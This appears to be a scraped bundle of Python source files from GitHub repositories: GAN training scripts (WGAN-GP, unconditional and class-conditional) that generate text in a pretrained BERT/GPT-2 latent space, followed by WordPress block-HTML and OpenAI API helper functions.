# checkpoint = torch.load(os.path.join(output_full_dir, 'training.bin'), map_location=torch.device('cpu')) # Paolo
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
print('We have added', num_added_toks, 'tokens to GPT2')
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Note: resize_token_embeddings expects the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
# Evaluation
# model_vae = VAE(model_encoder, model_decoder, tokenizer_encoder, tokenizer_decoder, args) # Paolo
# model_vae.load_state_dict(checkpoint['model_state_dict']) # Paolo
# logger.info("Pre-trained Optimus is successfully loaded") # Paolo
# model_vae.to(args.device) # Paolo
if args.interact_with_user_input:
if args.play_mode == 'interpolation':
if len(args.sent_source) > 0 and len(args.sent_target) > 0:
result = interpolate(model_encoder, model_decoder, tokenizer_encoder, tokenizer_decoder, args)
else:
print('Please check: specify the source and target sentences!')
if args.play_mode == 'analogy':
if len(args.sent_source) > 0 and len(args.sent_target) > 0 and len(args.sent_input) > 0:
result = analogy(model_encoder, model_decoder, tokenizer_encoder, tokenizer_decoder, args)
else:
print('Please check: specify the source, target and input analogy sentences!')
else:
result = evaluate_latent_space(args, model_encoder, model_decoder, tokenizer_encoder, tokenizer_decoder, prefix=global_step)
if __name__ == '__main__':
main()
| [] |
2024-01-10 | Egojr/optagan | optagan~wgan_gp_train.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
import numpy as np
from modules.gan import Generator, Critic
import glob
import os
import pickle
import random
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader)
import pdb
from modules.utils import (calc_blue_parallel_func, pad_seq, rollout, rollout_test)
from transformers.modeling_utils import top_k_top_p_filtering
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
def load_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
dataloader = BucketingDataLoader(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=True)
else:
pass
return dataloader
def compute_grad_penalty(critic, real_data, fake_data):
B = real_data.size(0)
alpha = torch.FloatTensor(np.random.random((B, 1)))
if args.cuda:
alpha = alpha.cuda()
sample = alpha*real_data + (1-alpha)*fake_data
sample.requires_grad_(True)
score = critic(sample)
outputs = torch.FloatTensor(B, 1).fill_(1.0) #args.latent_size
outputs.requires_grad_(False)
if args.cuda:
outputs = outputs.cuda()
grads = autograd.grad(
outputs=score,
inputs=sample,
grad_outputs=outputs,
create_graph=True,
retain_graph=True,
only_inputs=True
)[0]
#grads = grads.view(B, -1)
grad_penalty = ((grads.norm(2, dim=1) - 1.) ** 2).mean()
return grad_penalty
def train(epoch):
model_encoder.eval()
model_decoder.eval()
generator.train()
critic.train()
c_train_loss = 0.
g_train_loss = 0.
g_batches = 0
for i, x in enumerate(train_loader):
x = x[0]
if args.cuda:
x = x.cuda()
# Generate noise
B = args.per_gpu_train_batch_size
c_optimizer.zero_grad()
noise = torch.from_numpy(np.random.normal(0, 1, (B,
args.latent_size))).float()
if args.cuda:
noise = noise.cuda()
# Get original text latent embeddings
with torch.no_grad():
pooled_hidden_fea = model_encoder(x, attention_mask=(x > 0).float())[1]
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
z_real = mean.squeeze(1)
# train critic
z_fake = generator(noise)
real_score = critic(z_real)
fake_score = critic(z_fake)
grad_penalty = compute_grad_penalty(critic, z_real.data, z_fake.data)
c_loss = -torch.mean(real_score) + torch.mean(fake_score) + \
args.gp_lambda*grad_penalty
c_train_loss += c_loss.item()
c_loss.backward()
c_optimizer.step()
# train generator
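# Standard WGAN-GP schedule: one generator update per args.n_critic critic updates
# (default 5), in contrast to the adaptive loss-ratio schedule used in the other
# training scripts.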
if i % args.n_critic == 0:
g_batches += 1
g_optimizer.zero_grad()
fake_score = critic(generator(noise))
g_loss = -torch.mean(fake_score)
g_train_loss += g_loss.item()
g_loss.backward()
g_optimizer.step()
if args.interval > 0 and i % args.interval == 0:
logger.info('Epoch: {} | Batch: {}/{} ({:.0f}%) | G Loss: {:.6f} | C Loss: {:.6f}'.format(
epoch, args.batch_size*i, len(train_loader.dataset),
100.*(args.batch_size*i)/len(train_loader.dataset),
g_loss.item(), c_loss.item()
))
test_noise = torch.Tensor(np.random.normal(0, 1, (1, args.latent_size))).to(args.device)
test_new_z = generator(test_noise).data
# create new sent
test_z = rollout_test(model_decoder, test_new_z, tokenizer_decoder, args.max_seq_length, 1, 0, 1)
logger.info("Text: {}".format(test_z))
g_train_loss /= g_batches
c_train_loss /= len(train_loader)
logger.info('* (Train) Epoch: {} | G Loss: {:.4f} | C Loss: {:.4f}'.format(
epoch, g_train_loss, c_train_loss
))
return (g_train_loss, c_train_loss)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=15)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gp_lambda', type=int, default=10)
parser.add_argument('--n_critic', type=int, default=5, help="Number of critic updates before each generator update")
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator and critic")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10, help="Steps before logging output")
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
# Optimus parameters
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--valid_data_file", default=None, type=str, required=True,
help="The input validation data file (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument('--generator_dir', default=None, type=str, help="Directory where GAN models are saved")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
## Variational auto-encoder(check this)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expects to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
train_loader = build_dataload_and_cache_examples(args, [tokenizer_encoder, tokenizer_decoder])
generator = Generator(args.n_layers, args.block_dim,args.latent_size)
critic = Critic(args.n_layers, args.block_dim,args.latent_size)
if args.generator_dir!=None:
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
critic.load_state_dict(torch.load(args.generator_dir+'/critic_'+str(args.gloabl_step_eval)+'.th'))
g_optimizer = optim.Adam(generator.parameters(), lr=args.lr, betas=(0.5, 0.999))
c_optimizer = optim.Adam(critic.parameters(), lr=args.lr, betas=(0.5, 0.999))
if args.cuda:
generator = generator.cuda()
critic = critic.cuda()
logger.info('G Parameters:{}'.format(sum([p.numel() for p in generator.parameters() if \
p.requires_grad])))
logger.info('C Parameters:{}'.format(sum([p.numel() for p in critic.parameters() if \
p.requires_grad])))
best_bleu = 0
reference = list()
with(open(args.valid_data_file,"r")) as valid:
for sents in valid:
reference.append(sents.replace("\n", ""))
for epoch in range(1, args.epochs + 1):
g_loss, c_loss = train(epoch)
data_test = list()
for i in range(2):
test_noise = torch.Tensor(np.random.normal(0, 1, (250, args.latent_size))).to(args.device)
test_z = generator(test_noise).data
new_sent = rollout_test(model_decoder, test_z, tokenizer_decoder, args.max_seq_length, 250, 0, 1)
data_test.extend(new_sent)
p_reference = random.sample(reference, 500)
bleu = calc_blue_parallel_func(p_reference, data_test, 2, 500)
b_bleu = calc_blue_parallel_func(data_test, p_reference, 2, 500)
logger.info("Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}".format(bleu, b_bleu))
if (bleu+b_bleu) > best_bleu:
best_bleu = bleu + b_bleu
logger.info('* Saving. Best Score:{:0.3f} | Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}'.format(best_bleu, bleu, b_bleu))
torch.save(generator.state_dict(), args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th')
torch.save(critic.state_dict(), args.output_dir+'/critic_'+str(args.gloabl_step_eval)+'.th') | [] |
2024-01-10 | Egojr/optagan | optagan~cond_ad_wgan_gp_train.py | from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import logging
import torch
import torch.nn as nn
import torch.optim as optim
import torch.autograd as autograd
from torch.autograd import Variable
import numpy as np
from modules.gan import cond_Generator, cond_Critic, Classifier
import glob
import os
import pickle
import random
import torch.nn.functional as F
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
from func import GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig, BertConfig
from func import GPT2LMHeadModel, GPT2Tokenizer, GPT2ForLatentConnector
from func import OpenAIGPTLMHeadModel, OpenAIGPTTokenizer
from func import XLNetLMHeadModel, XLNetTokenizer
from func import TransfoXLLMHeadModel, TransfoXLTokenizer
from func import BertForLatentConnector, BertTokenizer
from collections import defaultdict
from utils import (TextDataset_Split, TextDataset_2Tokenizers, BucketingDataLoader, BucketingDataLoaderYelp)
import pdb
from modules.utils import (calc_blue_parallel_func, pad_seq, rollout, rollout_test)
from transformers.modeling_utils import top_k_top_p_filtering
MAX_LENGTH = int(10000) # Hardcoded max length to avoid infinite loop
ALL_MODELS = sum((tuple(conf.pretrained_config_archive_map.keys()) for conf in (GPT2Config, OpenAIGPTConfig, XLNetConfig, TransfoXLConfig)), ())
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
'gpt2': (GPT2Config, GPT2ForLatentConnector, GPT2Tokenizer),
'bert': (BertConfig, BertForLatentConnector, BertTokenizer)
}
def load_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
dataset = TextDataset_2Tokenizers(tokenizer, args, args.train_data_file, block_size=args.block_size)
else:
dataset = TextDataset_Split(tokenizer, args, args.train_data_file, block_size=args.block_size)
return dataset
def build_dataload_and_cache_examples(args, tokenizer):
if isinstance(tokenizer, list):
args.batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
file_path=args.train_data_file
dataloader = BucketingDataLoaderYelp(file_path, args.batch_size, args.max_seq_length, tokenizer, args, bucket=100, shuffle=True)
else:
pass
return dataloader
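# Conditional WGAN-GP gradient penalty: same interpolation as the unconditional case,
# but the critic is also conditioned on the class label.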
def compute_grad_penalty(critic, real_data, fake_data, label): #
B = real_data.size(0)
alpha = torch.FloatTensor(np.random.random((B, 1)))
if args.cuda:
alpha = alpha.cuda()
sample = alpha*real_data + (1-alpha)*fake_data
sample.requires_grad_(True)
score = critic(sample, label) #
outputs = torch.FloatTensor(B, 1).fill_(1.0) # args.latent_size
outputs.requires_grad_(False)
if args.cuda:
outputs = outputs.cuda()
grads = autograd.grad(
outputs=score,
inputs=sample,
grad_outputs=outputs,
create_graph=True,
retain_graph=True,
only_inputs=True
)[0]
grad_penalty = ((grads.norm(2, dim=1) - 1.) ** 2).mean()
return grad_penalty
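# Conditional training epoch: a latent classifier is fit on real codes every batch, while either
# the critic or the generator is updated depending on their relative loss changes (critic favoured in early epochs).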
def train(epoch):
model_encoder.eval()
model_decoder.eval()
generator.train()
critic.train()
classifier.train()
cl_train_loss = 0.
c_train_loss = 0.
g_train_loss = 0.
g_batches = 0
c_batches = 0
c_loss_0 = 1
g_loss_0 = 1
for i, x in enumerate(train_loader):
label = x[3]
x = x[0]
if args.cuda:
x = x.cuda()
# Generate noise and labels
gen_labels = (torch.rand(args.per_gpu_train_batch_size, 1) * args.n_classes).type(torch.LongTensor)
B = args.per_gpu_train_batch_size
noise = torch.from_numpy(np.random.normal(0, 1, (B,
args.latent_size))).float()
if args.cuda:
noise = noise.cuda()
label = label.cuda()
gen_labels = gen_labels.cuda()
# Get original text latent embeddings
with torch.no_grad():
pooled_hidden_fea = model_encoder(x, attention_mask=(x > 0).float())[1]
mean, logvar = model_encoder.linear(pooled_hidden_fea).chunk(2, -1)
z_real = mean.squeeze(1)
# Evaluate and get losses
z_fake = generator(noise, gen_labels)
real_score = critic(z_real, label)
fake_score = critic(z_fake, gen_labels)
grad_penalty = compute_grad_penalty(critic, z_real.data, z_fake.data, label.data)
pred_class = classifier(z_real)
cl_lab = label.clone().squeeze_()
# Classifier loss
cl_optimizer.zero_grad()
cl_loss = nn.CrossEntropyLoss()(pred_class.to(args.device), cl_lab)
cl_train_loss += cl_loss.item()
cl_loss.backward()
cl_optimizer.step()
# Train critic or generator
c_loss = -torch.mean(real_score) + torch.mean(fake_score) + \
args.gp_lambda*grad_penalty
fake_score = critic(generator(noise, gen_labels), gen_labels)
pred_gen_class = classifier(generator(noise, gen_labels)).to(args.device)
cl_gen_lab = gen_labels.clone().squeeze_()
g_cl_loss = nn.CrossEntropyLoss()(pred_gen_class, cl_gen_lab)
g_loss = -torch.mean(fake_score) + g_cl_loss * 10
r_g = abs(((g_loss.item() - g_loss_0) / (g_loss_0 + 0.001)))
r_c = abs(((c_loss.item() - c_loss_0) / (c_loss_0 + 0.001)))
if ((2 + epoch) / epoch) * r_c > r_g:
c_optimizer.zero_grad()
c_batches += 1
c_train_loss += c_loss.item()
c_loss.backward()
c_optimizer.step()
else:
g_optimizer.zero_grad()
g_batches += 1
g_train_loss += g_loss.item()
g_loss.backward()
g_optimizer.step()
c_loss_0 = c_loss.item()
g_loss_0 = g_loss.item()
if args.interval > 0 and i % args.interval == 0:
logger.info('Epoch: {} | Batch: {}/{} ({:.0f}%) | G Loss: {:.6f} | C Loss: {:.6f} | Cl Loss: {:.6f}'.format(
epoch, args.batch_size*i, len(train_loader.dataset),
100.*(args.batch_size*i)/len(train_loader.dataset),
g_loss.item(), c_loss.item(), cl_loss.item()
))
test_lab = (torch.rand(1, 1) * args.n_classes).type(torch.LongTensor).to(args.device)
test_noise = torch.Tensor(np.random.normal(0, 1, (1, args.latent_size))).to(args.device)
test_new_z = generator(test_noise, test_lab).data
# create new sent
test_z = rollout_test(model_decoder, test_new_z, tokenizer_decoder, args.max_seq_length, 1, 0, 1)
logger.info("Label: {} | Text: {}".format(test_lab.item(), test_z))
c_train_loss /= c_batches + 1
g_train_loss /= g_batches + 1
logger.info('* (Train) Epoch: {} | G Loss: {:.4f} | C Loss: {:.4f} | Updates G: {} | Updates C: {}'.format(
epoch, g_train_loss, c_train_loss, g_batches, c_batches
))
return (g_train_loss, c_train_loss)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--epochs', type=int, default=15)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--gp_lambda', type=int, default=10)
parser.add_argument('--n_layers', type=int, default=20, help="Number of layers of generator and critic")
parser.add_argument('--block_dim', type=int, default=100)
parser.add_argument('--interval', type=int, default=10, help="Steps before logging output")
parser.add_argument('--n_classes', type=int, default=4, help="Overall number of classes")
parser.add_argument('--cuda', type=bool, default=torch.cuda.is_available())
# Optimus parameters
parser.add_argument("--train_data_file", default=None, type=str, required=True,
help="The input training data file (a text file).")
parser.add_argument("--valid_data_file", default=None, type=str, required=True,
help="The input validation data file (a text file).")
parser.add_argument("--checkpoint_dir", default=None, type=str, required=True,
help="The directory where checkpoints are saved.")
parser.add_argument('--generator_dir', default=None, type=str, help="Directory where GAN models are saved")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument("--dataset", default='Snli', type=str, help="The dataset.")
parser.add_argument("--latent_size", default=32, type=int, help="Latent space dimension.")
## Encoder options
parser.add_argument("--encoder_model_type", default="bert", type=str,
help="The encoder model architecture to be fine-tuned.")
parser.add_argument("--encoder_model_name_or_path", default="bert-base-cased", type=str,
help="The encoder model checkpoint for weights initialization.")
parser.add_argument("--encoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--encoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
## Decoder options
parser.add_argument("--decoder_model_type", default="gpt2", type=str,
help="The decoder model architecture to be fine-tuned.")
parser.add_argument("--decoder_model_name_or_path", default="bert-base-cased", type=str,
help="The decoder model checkpoint for weights initialization.")
parser.add_argument("--decoder_config_name", default="", type=str,
help="Optional pretrained config name or path if not the same as model_name_or_path")
parser.add_argument("--decoder_tokenizer_name", default="", type=str,
help="Optional pretrained tokenizer name or path if not the same as model_name_or_path")
parser.add_argument("--per_gpu_train_batch_size", default=1, type=int,
help="Batch size per GPU/CPU for training.")
parser.add_argument("--max_seq_length", default=512, type=int,
help="Optional input sequence length before tokenization. The sequence will be dropped if it is longer the max_seq_length")
## Variational auto-encoder(check this)
parser.add_argument("--prompt", type=str, default="")
parser.add_argument("--padding_text", type=str, default="")
parser.add_argument("--length", type=int, default=20)
parser.add_argument("--block_size", default=-1, type=int,
help="Optional input sequence length after tokenization."
"The training dataset will be truncated in block of this size for training."
"Default to the model max input length for single sentence inputs (take into account special tokens).")
parser.add_argument("--do_lower_case", action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--use_philly", action='store_true',
help="Use Philly for computing.")
parser.add_argument('--gloabl_step_eval', type=int, default=661,
help="Evaluate the results at the given global step")
# Load a trained Encoder model and vocabulary that you have fine-tuned
args = parser.parse_args()
global_step = args.gloabl_step_eval
torch.backends.cudnn.deterministic = True
args.device = torch.device("cuda" if args.cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
args.encoder_model_type = args.encoder_model_type.lower()
args.decoder_model_type = args.decoder_model_type.lower()
output_encoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-encoder-{}'.format(global_step))
output_decoder_dir = os.path.join(args.checkpoint_dir, 'checkpoint-decoder-{}'.format(global_step))
checkpoints = [ [output_encoder_dir, output_decoder_dir] ]
# Load a trained Encoder model and vocabulary that you have fine-tuned
encoder_config_class, encoder_model_class, encoder_tokenizer_class = MODEL_CLASSES[args.encoder_model_type]
model_encoder = encoder_model_class.from_pretrained(output_encoder_dir, latent_size=args.latent_size)
tokenizer_encoder = encoder_tokenizer_class.from_pretrained(args.encoder_tokenizer_name if args.encoder_tokenizer_name else args.encoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_encoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_encoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_encoder.max_len_single_sentence)
# Load a trained Decoder model and vocabulary that you have fine-tuned
decoder_config_class, decoder_model_class, decoder_tokenizer_class = MODEL_CLASSES[args.decoder_model_type]
model_decoder = decoder_model_class.from_pretrained(output_decoder_dir, latent_size=args.latent_size)
tokenizer_decoder = decoder_tokenizer_class.from_pretrained(args.decoder_tokenizer_name if args.decoder_tokenizer_name else args.decoder_model_name_or_path, do_lower_case=args.do_lower_case)
model_decoder.to(args.device)
if args.block_size <= 0:
args.block_size = tokenizer_decoder.max_len_single_sentence # Our input block size will be the max possible for the model
args.block_size = min(args.block_size, tokenizer_decoder.max_len_single_sentence)
# Chunyuan: Add Padding token to GPT2
special_tokens_dict = {'pad_token': '<PAD>', 'bos_token': '<BOS>', 'eos_token': '<EOS>'}
num_added_toks = tokenizer_decoder.add_special_tokens(special_tokens_dict)
logger.info('We have added {} tokens to GPT2'.format(num_added_toks))
model_decoder.resize_token_embeddings(len(tokenizer_decoder)) # Notice: resize_token_embeddings expects to receive the full size of the new vocabulary, i.e. the length of the tokenizer.
assert tokenizer_decoder.pad_token == '<PAD>'
train_loader = build_dataload_and_cache_examples(args, [tokenizer_encoder, tokenizer_decoder])
generator = cond_Generator(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
critic = cond_Critic(args.n_layers, args.block_dim, args.latent_size, args.n_classes)
classifier = Classifier(args.latent_size, args.block_dim, args.n_classes)
if args.generator_dir!=None:
generator.load_state_dict(torch.load(args.generator_dir+'/generator_'+str(args.gloabl_step_eval)+'.th'))
critic.load_state_dict(torch.load(args.generator_dir+'/critic_'+str(args.gloabl_step_eval)+'.th'))
classifier.load_state_dict(torch.load(args.generator_dir+'/classifier_'+str(args.gloabl_step_eval)+'.th'))
cl_optimizer = optim.Adam(classifier.parameters(), lr=args.lr, betas=(0.5, 0.999))
g_optimizer = optim.Adam(generator.parameters(), lr=args.lr, betas=(0.5, 0.999))
c_optimizer = optim.Adam(critic.parameters(), lr=args.lr, betas=(0.5, 0.999))
if args.cuda:
generator = generator.cuda()
critic = critic.cuda()
classifier = classifier.cuda()
logger.info('G Parameters:{}'.format(sum([p.numel() for p in generator.parameters() if \
p.requires_grad])))
logger.info('C Parameters:{}'.format(sum([p.numel() for p in critic.parameters() if \
p.requires_grad])))
best_bleu = 0
reference = list()
with(open(args.valid_data_file,"r")) as valid:
for sents in valid:
reference.append(sents.replace("\n", ""))
for epoch in range(1, args.epochs + 1):
g_loss, c_loss = train(epoch)
data_test = list()
test_lab = torch.LongTensor([0]*100 + [1]*100 + [2]*100 + [3]*100 + [4]*100).to(args.device)
for i in range(5):
test_noise = torch.Tensor(np.random.normal(0, 1, (100, args.latent_size))).to(args.device)
test_z = generator(test_noise, test_lab[100*i:100*(i+1)]).data
new_sent = rollout_test(model_decoder, test_z, tokenizer_decoder, args.max_seq_length, 100, 0, 1)
data_test.extend(new_sent)
p_reference = random.sample(reference, 500)
data_test = [str(lab)+" "+str(sen) for lab,sen in zip(test_lab.tolist(), data_test)]
bleu = calc_blue_parallel_func(p_reference, data_test, 2, 500, True)
b_bleu = calc_blue_parallel_func(data_test, p_reference, 2, 500, True)
logger.info("Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}".format(bleu, b_bleu))
if (bleu+b_bleu) > best_bleu:
best_bleu = bleu + b_bleu
logger.info('* Saving. Best Score:{:0.3f} | Bleu-2:{:0.3f} | B-Bleu-2:{:0.3f}'.format(best_bleu, bleu, b_bleu))
torch.save(generator.state_dict(), args.output_dir+'/generator_'+str(args.gloabl_step_eval)+'.th')
torch.save(critic.state_dict(), args.output_dir+'/critic_'+str(args.gloabl_step_eval)+'.th')
torch.save(classifier.state_dict(), args.output_dir+'/classifier_'+str(args.gloabl_step_eval)+'.th') | [] |
2024-01-10 | meher09/Api-Usage-Practice | Module%2015~wpFunc.py | def list_html_list(any_list):
start = '<!-- wp:list --><ul>'
for element in any_list:
start += f'<!-- wp:list-item --><li>{element}</li><!-- /wp:list-item -->'
ends = '</ul><!-- /wp:list -->'
code = start+ends
return code
def dict_list(dicts):
start = '<!-- wp:list --><ul>'
for key, value in dicts.items():
start += f'<!-- wp:list-item --><li><strong>{key.title()}</strong>: {value.title()}</li><!-- /wp:list-item -->'
ends = '</ul><!-- /wp:list -->'
code = start + ends
return code
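# Build a Basic Auth header for the WordPress REST API from a username and application password.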
def headers(username, password):
import base64
credential = f'{username}:{password}'
token = base64.b64encode(credential.encode())
code = {'Authorization': f'Basic {token.decode("utf-8")}'}
return code
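# Build a centered WordPress image block with the given source URL and caption.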
def image_url(src, name):
first_line = '<!-- wp:image {"align":"center","sizeSlug":"large"} -->'
second = f'<figure class="wp-block-image aligncenter size-large"><img src="{src}" alt="{name}"/>'
last = f'<figcaption class="wp-element-caption">{name}</figcaption></figure><!-- /wp:image -->'
code = f'{first_line}{second}{last}'
return code
def wph2(text):
return f'<!-- wp:heading --><h2>{text}</h2><!-- /wp:heading -->'
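# Generate text with the OpenAI Completion API (text-davinci-003) and wrap it in a WordPress paragraph block.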
def openai_text(prompt):
import os
from dotenv import load_dotenv
load_dotenv()
import openai
openai.api_key = os.getenv('API_KEY')
response = openai.Completion.create(
model="text-davinci-003",
prompt= prompt,
temperature=0.7,
max_tokens=256,
top_p=1,
frequency_penalty=0,
presence_penalty=0
)
data = response.get('choices')[0].get('text').strip()
code = f'<!-- wp:paragraph --><p>{data}</p><!-- /wp:paragraph -->'
return code
| [] |
2024-01-10 | meher09/Api-Usage-Practice | Module%2010~92%20Open%20Ai%20Data%20Get.py | import openai
import os
